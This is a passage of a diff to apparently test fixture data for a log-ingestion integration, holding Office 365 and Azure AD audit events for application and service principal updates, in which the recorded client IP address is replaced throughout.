0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -502,9 +502,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { @@ -707,7 +707,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -737,9 +737,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { @@ -954,7 +954,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -984,9 +984,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { @@ -1201,7 +1201,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 